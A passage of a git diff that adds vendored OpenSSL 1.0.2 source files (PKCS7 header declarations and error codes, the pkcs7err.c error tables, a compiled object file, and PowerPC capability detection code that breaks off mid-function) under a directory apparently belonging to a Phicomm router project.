+int PKCS7_add_recipient_info(PKCS7 *p7, PKCS7_RECIP_INFO *ri);
+int PKCS7_RECIP_INFO_set(PKCS7_RECIP_INFO *p7i, X509 *x509);
+int PKCS7_set_cipher(PKCS7 *p7, const EVP_CIPHER *cipher);
+int PKCS7_stream(unsigned char ***boundary, PKCS7 *p7);
+
+PKCS7_ISSUER_AND_SERIAL *PKCS7_get_issuer_and_serial(PKCS7 *p7, int idx);
+ASN1_OCTET_STRING *PKCS7_digest_from_attributes(STACK_OF(X509_ATTRIBUTE) *sk);
+int PKCS7_add_signed_attribute(PKCS7_SIGNER_INFO *p7si, int nid, int type,
+                               void *data);
+int PKCS7_add_attribute(PKCS7_SIGNER_INFO *p7si, int nid, int atrtype,
+                        void *value);
+ASN1_TYPE *PKCS7_get_attribute(PKCS7_SIGNER_INFO *si, int nid);
+ASN1_TYPE *PKCS7_get_signed_attribute(PKCS7_SIGNER_INFO *si, int nid);
+int PKCS7_set_signed_attributes(PKCS7_SIGNER_INFO *p7si,
+                                STACK_OF(X509_ATTRIBUTE) *sk);
+int PKCS7_set_attributes(PKCS7_SIGNER_INFO *p7si,
+                         STACK_OF(X509_ATTRIBUTE) *sk);
+
+PKCS7 *PKCS7_sign(X509 *signcert, EVP_PKEY *pkey, STACK_OF(X509) *certs,
+                  BIO *data, int flags);
+
+PKCS7_SIGNER_INFO *PKCS7_sign_add_signer(PKCS7 *p7,
+                                         X509 *signcert, EVP_PKEY *pkey,
+                                         const EVP_MD *md, int flags);
+
+int PKCS7_final(PKCS7 *p7, BIO *data, int flags);
+int PKCS7_verify(PKCS7 *p7, STACK_OF(X509) *certs, X509_STORE *store,
+                 BIO *indata, BIO *out, int flags);
+STACK_OF(X509) *PKCS7_get0_signers(PKCS7 *p7, STACK_OF(X509) *certs,
+                                   int flags);
+PKCS7 *PKCS7_encrypt(STACK_OF(X509) *certs, BIO *in, const EVP_CIPHER *cipher,
+                     int flags);
+int PKCS7_decrypt(PKCS7 *p7, EVP_PKEY *pkey, X509 *cert, BIO *data,
+                  int flags);
+
+int PKCS7_add_attrib_smimecap(PKCS7_SIGNER_INFO *si,
+                              STACK_OF(X509_ALGOR) *cap);
+STACK_OF(X509_ALGOR) *PKCS7_get_smimecap(PKCS7_SIGNER_INFO *si);
+int PKCS7_simple_smimecap(STACK_OF(X509_ALGOR) *sk, int nid, int arg);
+
+int PKCS7_add_attrib_content_type(PKCS7_SIGNER_INFO *si, ASN1_OBJECT *coid);
+int PKCS7_add0_attrib_signing_time(PKCS7_SIGNER_INFO *si, ASN1_TIME *t);
+int PKCS7_add1_attrib_digest(PKCS7_SIGNER_INFO *si,
+                             const unsigned char *md, int mdlen);
+
+int SMIME_write_PKCS7(BIO *bio, PKCS7 *p7, BIO *data, int flags);
+PKCS7 *SMIME_read_PKCS7(BIO *bio, BIO **bcont);
+
+BIO *BIO_new_PKCS7(BIO *out, PKCS7 *p7);
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_PKCS7_strings(void);
+
+/* Error codes for the PKCS7 functions. */
+
+/* Function codes. */
+# define PKCS7_F_B64_READ_PKCS7                           120
+# define PKCS7_F_B64_WRITE_PKCS7                          121
+# define PKCS7_F_DO_PKCS7_SIGNED_ATTRIB                   136
+# define PKCS7_F_I2D_PKCS7_BIO_STREAM                     140
+# define PKCS7_F_PKCS7_ADD0_ATTRIB_SIGNING_TIME           135
+# define PKCS7_F_PKCS7_ADD_ATTRIB_SMIMECAP                118
+# define PKCS7_F_PKCS7_ADD_CERTIFICATE                    100
+# define PKCS7_F_PKCS7_ADD_CRL                            101
+# define PKCS7_F_PKCS7_ADD_RECIPIENT_INFO                 102
+# define PKCS7_F_PKCS7_ADD_SIGNATURE                      131
+# define PKCS7_F_PKCS7_ADD_SIGNER                         103
+# define PKCS7_F_PKCS7_BIO_ADD_DIGEST                     125
+# define PKCS7_F_PKCS7_COPY_EXISTING_DIGEST               138
+# define PKCS7_F_PKCS7_CTRL                               104
+# define PKCS7_F_PKCS7_DATADECODE                         112
+# define PKCS7_F_PKCS7_DATAFINAL                          128
+# define PKCS7_F_PKCS7_DATAINIT                           105
+# define PKCS7_F_PKCS7_DATASIGN                           106
+# define PKCS7_F_PKCS7_DATAVERIFY                         107
+# define PKCS7_F_PKCS7_DECRYPT                            114
+# define PKCS7_F_PKCS7_DECRYPT_RINFO                      133
+# define PKCS7_F_PKCS7_ENCODE_RINFO                       132
+# define PKCS7_F_PKCS7_ENCRYPT                            115
+# define PKCS7_F_PKCS7_FINAL                              134
+# define PKCS7_F_PKCS7_FIND_DIGEST                        127
+# define PKCS7_F_PKCS7_GET0_SIGNERS                       124
+# define PKCS7_F_PKCS7_RECIP_INFO_SET                     130
+# define PKCS7_F_PKCS7_SET_CIPHER                         108
+# define PKCS7_F_PKCS7_SET_CONTENT                        109
+# define PKCS7_F_PKCS7_SET_DIGEST                         126
+# define PKCS7_F_PKCS7_SET_TYPE                           110
+# define PKCS7_F_PKCS7_SIGN                               116
+# define PKCS7_F_PKCS7_SIGNATUREVERIFY                    113
+# define PKCS7_F_PKCS7_SIGNER_INFO_SET                    129
+# define PKCS7_F_PKCS7_SIGNER_INFO_SIGN                   139
+# define PKCS7_F_PKCS7_SIGN_ADD_SIGNER                    137
+# define PKCS7_F_PKCS7_SIMPLE_SMIMECAP                    119
+# define PKCS7_F_PKCS7_VERIFY                             117
+# define PKCS7_F_SMIME_READ_PKCS7                         122
+# define PKCS7_F_SMIME_TEXT                               123
+
+/* Reason codes. */
+# define PKCS7_R_CERTIFICATE_VERIFY_ERROR                 117
+# define PKCS7_R_CIPHER_HAS_NO_OBJECT_IDENTIFIER          144
+# define PKCS7_R_CIPHER_NOT_INITIALIZED                   116
+# define PKCS7_R_CONTENT_AND_DATA_PRESENT                 118
+# define PKCS7_R_CTRL_ERROR                               152
+# define PKCS7_R_DECODE_ERROR                             130
+# define PKCS7_R_DECRYPTED_KEY_IS_WRONG_LENGTH            100
+# define PKCS7_R_DECRYPT_ERROR                            119
+# define PKCS7_R_DIGEST_FAILURE                           101
+# define PKCS7_R_ENCRYPTION_CTRL_FAILURE                  149
+# define PKCS7_R_ENCRYPTION_NOT_SUPPORTED_FOR_THIS_KEY_TYPE 150
+# define PKCS7_R_ERROR_ADDING_RECIPIENT                   120
+# define PKCS7_R_ERROR_SETTING_CIPHER                     121
+# define PKCS7_R_INVALID_MIME_TYPE                        131
+# define PKCS7_R_INVALID_NULL_POINTER                     143
+# define PKCS7_R_INVALID_SIGNED_DATA_TYPE                 155
+# define PKCS7_R_MIME_NO_CONTENT_TYPE                     132
+# define PKCS7_R_MIME_PARSE_ERROR                         133
+# define PKCS7_R_MIME_SIG_PARSE_ERROR                     134
+# define PKCS7_R_MISSING_CERIPEND_INFO                    103
+# define PKCS7_R_NO_CONTENT                               122
+# define PKCS7_R_NO_CONTENT_TYPE                          135
+# define PKCS7_R_NO_DEFAULT_DIGEST                        151
+# define PKCS7_R_NO_MATCHING_DIGEST_TYPE_FOUND            154
+# define PKCS7_R_NO_MULTIPART_BODY_FAILURE                136
+# define PKCS7_R_NO_MULTIPART_BOUNDARY                    137
+# define PKCS7_R_NO_RECIPIENT_MATCHES_CERTIFICATE         115
+# define PKCS7_R_NO_RECIPIENT_MATCHES_KEY                 146
+# define PKCS7_R_NO_SIGNATURES_ON_DATA                    123
+# define PKCS7_R_NO_SIGNERS                               142
+# define PKCS7_R_NO_SIG_CONTENT_TYPE                      138
+# define PKCS7_R_OPERATION_NOT_SUPPORTED_ON_THIS_TYPE     104
+# define PKCS7_R_PKCS7_ADD_SIGNATURE_ERROR                124
+# define PKCS7_R_PKCS7_ADD_SIGNER_ERROR                   153
+# define PKCS7_R_PKCS7_DATAFINAL                          126
+# define PKCS7_R_PKCS7_DATAFINAL_ERROR                    125
+# define PKCS7_R_PKCS7_DATASIGN                           145
+# define PKCS7_R_PKCS7_PARSE_ERROR                        139
+# define PKCS7_R_PKCS7_SIG_PARSE_ERROR                    140
+# define PKCS7_R_PRIVATE_KEY_DOES_NOT_MATCH_CERTIFICATE   127
+# define PKCS7_R_SIGNATURE_FAILURE                        105
+# define PKCS7_R_SIGNER_CERTIFICATE_NOT_FOUND             128
+# define PKCS7_R_SIGNING_CTRL_FAILURE                     147
+# define PKCS7_R_SIGNING_NOT_SUPPORTED_FOR_THIS_KEY_TYPE  148
+# define PKCS7_R_SIG_INVALID_MIME_TYPE                    141
+# define PKCS7_R_SMIME_TEXT_ERROR                         129
+# define PKCS7_R_UNABLE_TO_FIND_CERTIFICATE               106
+# define PKCS7_R_UNABLE_TO_FIND_MEM_BIO                   107
+# define PKCS7_R_UNABLE_TO_FIND_MESSAGE_DIGEST            108
+# define PKCS7_R_UNKNOWN_DIGEST_TYPE                      109
+# define PKCS7_R_UNKNOWN_OPERATION                        110
+# define PKCS7_R_UNSUPPORTED_CIPHER_TYPE                  111
+# define PKCS7_R_UNSUPPORTED_CONTENT_TYPE                 112
+# define PKCS7_R_WRONG_CONTENT_TYPE                       113
+# define PKCS7_R_WRONG_PKCS7_TYPE                         114
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pkcs7err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pkcs7err.c
new file mode 100644
index 0000000..323513f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pkcs7err.c
@@ -0,0 +1,207 @@
+/* crypto/pkcs7/pkcs7err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2014 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/pkcs7.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_PKCS7,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_PKCS7,0,reason)
+
+static ERR_STRING_DATA PKCS7_str_functs[] = {
+    {ERR_FUNC(PKCS7_F_B64_READ_PKCS7), "B64_READ_PKCS7"},
+    {ERR_FUNC(PKCS7_F_B64_WRITE_PKCS7), "B64_WRITE_PKCS7"},
+    {ERR_FUNC(PKCS7_F_DO_PKCS7_SIGNED_ATTRIB), "DO_PKCS7_SIGNED_ATTRIB"},
+    {ERR_FUNC(PKCS7_F_I2D_PKCS7_BIO_STREAM), "i2d_PKCS7_bio_stream"},
+    {ERR_FUNC(PKCS7_F_PKCS7_ADD0_ATTRIB_SIGNING_TIME),
+     "PKCS7_add0_attrib_signing_time"},
+    {ERR_FUNC(PKCS7_F_PKCS7_ADD_ATTRIB_SMIMECAP),
+     "PKCS7_add_attrib_smimecap"},
+    {ERR_FUNC(PKCS7_F_PKCS7_ADD_CERTIFICATE), "PKCS7_add_certificate"},
+    {ERR_FUNC(PKCS7_F_PKCS7_ADD_CRL), "PKCS7_add_crl"},
+    {ERR_FUNC(PKCS7_F_PKCS7_ADD_RECIPIENT_INFO), "PKCS7_add_recipient_info"},
+    {ERR_FUNC(PKCS7_F_PKCS7_ADD_SIGNATURE), "PKCS7_add_signature"},
+    {ERR_FUNC(PKCS7_F_PKCS7_ADD_SIGNER), "PKCS7_add_signer"},
+    {ERR_FUNC(PKCS7_F_PKCS7_BIO_ADD_DIGEST), "PKCS7_BIO_ADD_DIGEST"},
+    {ERR_FUNC(PKCS7_F_PKCS7_COPY_EXISTING_DIGEST),
+     "PKCS7_COPY_EXISTING_DIGEST"},
+    {ERR_FUNC(PKCS7_F_PKCS7_CTRL), "PKCS7_ctrl"},
+    {ERR_FUNC(PKCS7_F_PKCS7_DATADECODE), "PKCS7_dataDecode"},
+    {ERR_FUNC(PKCS7_F_PKCS7_DATAFINAL), "PKCS7_dataFinal"},
+    {ERR_FUNC(PKCS7_F_PKCS7_DATAINIT), "PKCS7_dataInit"},
+    {ERR_FUNC(PKCS7_F_PKCS7_DATASIGN), "PKCS7_DATASIGN"},
+    {ERR_FUNC(PKCS7_F_PKCS7_DATAVERIFY), "PKCS7_dataVerify"},
+    {ERR_FUNC(PKCS7_F_PKCS7_DECRYPT), "PKCS7_decrypt"},
+    {ERR_FUNC(PKCS7_F_PKCS7_DECRYPT_RINFO), "PKCS7_DECRYPT_RINFO"},
+    {ERR_FUNC(PKCS7_F_PKCS7_ENCODE_RINFO), "PKCS7_ENCODE_RINFO"},
+    {ERR_FUNC(PKCS7_F_PKCS7_ENCRYPT), "PKCS7_encrypt"},
+    {ERR_FUNC(PKCS7_F_PKCS7_FINAL), "PKCS7_final"},
+    {ERR_FUNC(PKCS7_F_PKCS7_FIND_DIGEST), "PKCS7_FIND_DIGEST"},
+    {ERR_FUNC(PKCS7_F_PKCS7_GET0_SIGNERS), "PKCS7_get0_signers"},
+    {ERR_FUNC(PKCS7_F_PKCS7_RECIP_INFO_SET), "PKCS7_RECIP_INFO_set"},
+    {ERR_FUNC(PKCS7_F_PKCS7_SET_CIPHER), "PKCS7_set_cipher"},
+    {ERR_FUNC(PKCS7_F_PKCS7_SET_CONTENT), "PKCS7_set_content"},
+    {ERR_FUNC(PKCS7_F_PKCS7_SET_DIGEST), "PKCS7_set_digest"},
+    {ERR_FUNC(PKCS7_F_PKCS7_SET_TYPE), "PKCS7_set_type"},
+    {ERR_FUNC(PKCS7_F_PKCS7_SIGN), "PKCS7_sign"},
+    {ERR_FUNC(PKCS7_F_PKCS7_SIGNATUREVERIFY), "PKCS7_signatureVerify"},
+    {ERR_FUNC(PKCS7_F_PKCS7_SIGNER_INFO_SET), "PKCS7_SIGNER_INFO_set"},
+    {ERR_FUNC(PKCS7_F_PKCS7_SIGNER_INFO_SIGN), "PKCS7_SIGNER_INFO_sign"},
+    {ERR_FUNC(PKCS7_F_PKCS7_SIGN_ADD_SIGNER), "PKCS7_sign_add_signer"},
+    {ERR_FUNC(PKCS7_F_PKCS7_SIMPLE_SMIMECAP), "PKCS7_simple_smimecap"},
+    {ERR_FUNC(PKCS7_F_PKCS7_VERIFY), "PKCS7_verify"},
+    {ERR_FUNC(PKCS7_F_SMIME_READ_PKCS7), "SMIME_read_PKCS7"},
+    {ERR_FUNC(PKCS7_F_SMIME_TEXT), "SMIME_text"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA PKCS7_str_reasons[] = {
+    {ERR_REASON(PKCS7_R_CERTIFICATE_VERIFY_ERROR),
+     "certificate verify error"},
+    {ERR_REASON(PKCS7_R_CIPHER_HAS_NO_OBJECT_IDENTIFIER),
+     "cipher has no object identifier"},
+    {ERR_REASON(PKCS7_R_CIPHER_NOT_INITIALIZED), "cipher not initialized"},
+    {ERR_REASON(PKCS7_R_CONTENT_AND_DATA_PRESENT),
+     "content and data present"},
+    {ERR_REASON(PKCS7_R_CTRL_ERROR), "ctrl error"},
+    {ERR_REASON(PKCS7_R_DECODE_ERROR), "decode error"},
+    {ERR_REASON(PKCS7_R_DECRYPTED_KEY_IS_WRONG_LENGTH),
+     "decrypted key is wrong length"},
+    {ERR_REASON(PKCS7_R_DECRYPT_ERROR), "decrypt error"},
+    {ERR_REASON(PKCS7_R_DIGEST_FAILURE), "digest failure"},
+    {ERR_REASON(PKCS7_R_ENCRYPTION_CTRL_FAILURE), "encryption ctrl failure"},
+    {ERR_REASON(PKCS7_R_ENCRYPTION_NOT_SUPPORTED_FOR_THIS_KEY_TYPE),
+     "encryption not supported for this key type"},
+    {ERR_REASON(PKCS7_R_ERROR_ADDING_RECIPIENT), "error adding recipient"},
+    {ERR_REASON(PKCS7_R_ERROR_SETTING_CIPHER), "error setting cipher"},
+    {ERR_REASON(PKCS7_R_INVALID_MIME_TYPE), "invalid mime type"},
+    {ERR_REASON(PKCS7_R_INVALID_NULL_POINTER), "invalid null pointer"},
+    {ERR_REASON(PKCS7_R_INVALID_SIGNED_DATA_TYPE),
+     "invalid signed data type"},
+    {ERR_REASON(PKCS7_R_MIME_NO_CONTENT_TYPE), "mime no content type"},
+    {ERR_REASON(PKCS7_R_MIME_PARSE_ERROR), "mime parse error"},
+    {ERR_REASON(PKCS7_R_MIME_SIG_PARSE_ERROR), "mime sig parse error"},
+    {ERR_REASON(PKCS7_R_MISSING_CERIPEND_INFO), "missing ceripend info"},
+    {ERR_REASON(PKCS7_R_NO_CONTENT), "no content"},
+    {ERR_REASON(PKCS7_R_NO_CONTENT_TYPE), "no content type"},
+    {ERR_REASON(PKCS7_R_NO_DEFAULT_DIGEST), "no default digest"},
+    {ERR_REASON(PKCS7_R_NO_MATCHING_DIGEST_TYPE_FOUND),
+     "no matching digest type found"},
+    {ERR_REASON(PKCS7_R_NO_MULTIPART_BODY_FAILURE),
+     "no multipart body failure"},
+    {ERR_REASON(PKCS7_R_NO_MULTIPART_BOUNDARY), "no multipart boundary"},
+    {ERR_REASON(PKCS7_R_NO_RECIPIENT_MATCHES_CERTIFICATE),
+     "no recipient matches certificate"},
+    {ERR_REASON(PKCS7_R_NO_RECIPIENT_MATCHES_KEY),
+     "no recipient matches key"},
+    {ERR_REASON(PKCS7_R_NO_SIGNATURES_ON_DATA), "no signatures on data"},
+    {ERR_REASON(PKCS7_R_NO_SIGNERS), "no signers"},
+    {ERR_REASON(PKCS7_R_NO_SIG_CONTENT_TYPE), "no sig content type"},
+    {ERR_REASON(PKCS7_R_OPERATION_NOT_SUPPORTED_ON_THIS_TYPE),
+     "operation not supported on this type"},
+    {ERR_REASON(PKCS7_R_PKCS7_ADD_SIGNATURE_ERROR),
+     "pkcs7 add signature error"},
+    {ERR_REASON(PKCS7_R_PKCS7_ADD_SIGNER_ERROR), "pkcs7 add signer error"},
+    {ERR_REASON(PKCS7_R_PKCS7_DATAFINAL), "pkcs7 datafinal"},
+    {ERR_REASON(PKCS7_R_PKCS7_DATAFINAL_ERROR), "pkcs7 datafinal error"},
+    {ERR_REASON(PKCS7_R_PKCS7_DATASIGN), "pkcs7 datasign"},
+    {ERR_REASON(PKCS7_R_PKCS7_PARSE_ERROR), "pkcs7 parse error"},
+    {ERR_REASON(PKCS7_R_PKCS7_SIG_PARSE_ERROR), "pkcs7 sig parse error"},
+    {ERR_REASON(PKCS7_R_PRIVATE_KEY_DOES_NOT_MATCH_CERTIFICATE),
+     "private key does not match certificate"},
+    {ERR_REASON(PKCS7_R_SIGNATURE_FAILURE), "signature failure"},
+    {ERR_REASON(PKCS7_R_SIGNER_CERTIFICATE_NOT_FOUND),
+     "signer certificate not found"},
+    {ERR_REASON(PKCS7_R_SIGNING_CTRL_FAILURE), "signing ctrl failure"},
+    {ERR_REASON(PKCS7_R_SIGNING_NOT_SUPPORTED_FOR_THIS_KEY_TYPE),
+     "signing not supported for this key type"},
+    {ERR_REASON(PKCS7_R_SIG_INVALID_MIME_TYPE), "sig invalid mime type"},
+    {ERR_REASON(PKCS7_R_SMIME_TEXT_ERROR), "smime text error"},
+    {ERR_REASON(PKCS7_R_UNABLE_TO_FIND_CERTIFICATE),
+     "unable to find certificate"},
+    {ERR_REASON(PKCS7_R_UNABLE_TO_FIND_MEM_BIO), "unable to find mem bio"},
+    {ERR_REASON(PKCS7_R_UNABLE_TO_FIND_MESSAGE_DIGEST),
+     "unable to find message digest"},
+    {ERR_REASON(PKCS7_R_UNKNOWN_DIGEST_TYPE), "unknown digest type"},
+    {ERR_REASON(PKCS7_R_UNKNOWN_OPERATION), "unknown operation"},
+    {ERR_REASON(PKCS7_R_UNSUPPORTED_CIPHER_TYPE), "unsupported cipher type"},
+    {ERR_REASON(PKCS7_R_UNSUPPORTED_CONTENT_TYPE),
+     "unsupported content type"},
+    {ERR_REASON(PKCS7_R_WRONG_CONTENT_TYPE), "wrong content type"},
+    {ERR_REASON(PKCS7_R_WRONG_PKCS7_TYPE), "wrong pkcs7 type"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_PKCS7_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(PKCS7_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, PKCS7_str_functs);
+        ERR_load_strings(0, PKCS7_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pkcs7err.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pkcs7err.o
new file mode 100644
index 0000000000000000000000000000000000000000..657fa0796edbe40b50b49444b577152f2e79abfb
GIT binary patch
literal 1368
zcmbtS-AV#c5T11_`w{w~i=YUji;D7~{UCJ_3u0Xq5r*JR$f}!$y2|bmtc!Yu9;HVJ
zdWjyR=&qZZanD(gCnKnV*_ruvzWF)l+-FaZB8CA{3^;^-BvF7ur0-ij*Mb;K!Ta>`
z$1@yfG6(VXe5vE|PJEy3uw){Y?)1Xc-FA{CcQ*nUMvyy$I*NLHmIo~RM3{+6G9MT)
zZgXICXN<*Ibo>DaB78~wBkpfPJB+~F=de6;=!P_dvZO*Z!|4<dU9-2vAV!f1W8c9Z
z9{mBQ6Bv{jhI7iC;m+-P*-ty3$I6h+<%*4#T`8WQWG>Q0pL^GC)eq{#MLF7NU@PX|
zG`U>@hUtN=Nsl{S4y<Bx8(7Krft6d$rsE>!wz$Lax)MIO%XJY~-41Jet+wOw8(^N(
zu$faUUU_!Y5zYT$7LiMLsGp=IYKG?_V*SmoAWoQkS0W9v($TEWU&H_7sDI^eA(v_<
zQB{%sH&qaQ*<ac{1yfVoYM}U%Cn4%XuWjJ&F_!!|`l`^bs$60~HFf@jNYeMx`320Q
zS8a)WX<o#j3j&xxOLI!T#E11J$`gH1UIPP@XsL$ICrrOPqCATJs}v|A;1HQbZy5ho
LBv!-Bz|r|%@F!4~

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ppc_arch.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ppc_arch.h
new file mode 100644
index 0000000..b50ec99
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ppc_arch.h
@@ -0,0 +1,10 @@
+#ifndef __PPC_ARCH_H__
+# define __PPC_ARCH_H__
+
+extern unsigned int OPENSSL_ppccap_P;
+
+# define PPC_FPU64       (1<<0)
+# define PPC_ALTIVEC     (1<<1)
+# define PPC_CRYPTO207   (1<<2)
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ppccap.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ppccap.c
new file mode 100644
index 0000000..2b7f704
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ppccap.c
@@ -0,0 +1,159 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <setjmp.h>
+#include <signal.h>
+#include <unistd.h>
+#if defined(__linux) || defined(_AIX)
+# include <sys/utsname.h>
+#endif
+#include <crypto.h>
+#include <openssl/bn.h>
+
+#include "ppc_arch.h"
+
+unsigned int OPENSSL_ppccap_P = 0;
+
+static sigset_t all_masked;
+
+#ifdef OPENSSL_BN_ASM_MONT
+int bn_mul_mont(BN_ULONG *rp, const BN_ULONG *ap, const BN_ULONG *bp,
+                const BN_ULONG *np, const BN_ULONG *n0, int num)
+{
+    int bn_mul_mont_fpu64(BN_ULONG *rp, const BN_ULONG *ap,
+                          const BN_ULONG *bp, const BN_ULONG *np,
+                          const BN_ULONG *n0, int num);
+    int bn_mul_mont_int(BN_ULONG *rp, const BN_ULONG *ap, const BN_ULONG *bp,
+                        const BN_ULONG *np, const BN_ULONG *n0, int num);
+
+    if (sizeof(size_t) == 4) {
+# if 1 || (defined(__APPLE__) && defined(__MACH__))
+        if (num >= 8 && (num & 3) == 0 && (OPENSSL_ppccap_P & PPC_FPU64))
+            return bn_mul_mont_fpu64(rp, ap, bp, np, n0, num);
+# else
+        /*
+         * boundary of 32 was experimentally determined on Linux 2.6.22,
+         * might have to be adjusted on AIX...
+         */
+        if (num >= 32 && (num & 3) == 0 && (OPENSSL_ppccap_P & PPC_FPU64)) {
+            sigset_t oset;
+            int ret;
+
+            sigprocmask(SIG_SETMASK, &all_masked, &oset);
+            ret = bn_mul_mont_fpu64(rp, ap, bp, np, n0, num);
+            sigprocmask(SIG_SETMASK, &oset, NULL);
+
+            return ret;
+        }
+# endif
+    } else if ((OPENSSL_ppccap_P & PPC_FPU64))
+        /*
+         * this is a "must" on POWER6, but run-time detection is not
+         * implemented yet...
+         */
+        return bn_mul_mont_fpu64(rp, ap, bp, np, n0, num);
+
+    return bn_mul_mont_int(rp, ap, bp, np, n0, num);
+}
+#endif
+
+void sha256_block_p8(void *ctx, const void *inp, size_t len);
+void sha256_block_ppc(void *ctx, const void *inp, size_t len);
+void sha256_block_data_order(void *ctx, const void *inp, size_t len)
+{
+    OPENSSL_ppccap_P & PPC_CRYPTO207 ? sha256_block_p8(ctx, inp, len) :
+        sha256_block_ppc(ctx, inp, len);
+}
+
+void sha512_block_p8(void *ctx, const void *inp, size_t len);
+void sha512_block_ppc(void *ctx, const void *inp, size_t len);
+void sha512_block_data_order(void *ctx, const void *inp, size_t len)
+{
+    OPENSSL_ppccap_P & PPC_CRYPTO207 ? sha512_block_p8(ctx, inp, len) :
+        sha512_block_ppc(ctx, inp, len);
+}
+
+static sigjmp_buf ill_jmp;
+static void ill_handler(int sig)
+{
+    siglongjmp(ill_jmp, sig);
+}
+
+void OPENSSL_ppc64_probe(void);
+void OPENSSL_altivec_probe(void);
+void OPENSSL_crypto207_probe(void);
+
+void OPENSSL_cpuid_setup(void)
+{
+    char *e;
+    struct sigaction ill_oact, ill_act;
+    sigset_t oset;
+    static int trigger = 0;
+
+    if (trigger)
+        return;
+    trigger = 1;
+
+    sigfillset(&all_masked);
+    sigdelset(&all_masked, SIGILL);
+    sigdelset(&all_masked, SIGTRAP);
+#ifdef SIGEMT
+    sigdelset(&all_masked, SIGEMT);
+#endif
+    sigdelset(&all_masked, SIGFPE);
+    sigdelset(&all_masked, SIGBUS);
+    sigdelset(&all_masked, SIGSEGV);
+
+    if ((e = getenv("OPENSSL_ppccap"))) {
+        OPENSSL_ppccap_P = strtoul(e, NULL, 0);
+        return;
+    }
+
+    OPENSSL_ppccap_P = 0;
+
+#if defined(_AIX)
+    if (sizeof(size_t) == 4) {
+        struct utsname uts;
+# if defined(_SC_AIX_KERNEL_BITMODE)
+        if (sysconf(_SC_AIX_KERNEL_BITMODE) != 64)
+            return;
+# endif
+        if (uname(&uts) != 0 || atoi(uts.version) < 6)
+            return;
+    }
+#endif
+
+    memset(&ill_act, 0, sizeof(ill_act));
+    ill_act.sa_handler = ill_handler;
+    ill_act.sa_mask = all_masked;
+
+    sigprocmask(SIG_SETMASK, &ill_act.sa_mask, &oset);
+    sigaction(SIGILL, &ill_act, &ill_oact);
+
+    if (sizeof(size_t) == 4) {
+#ifdef __linux
+        struct utsname uts;
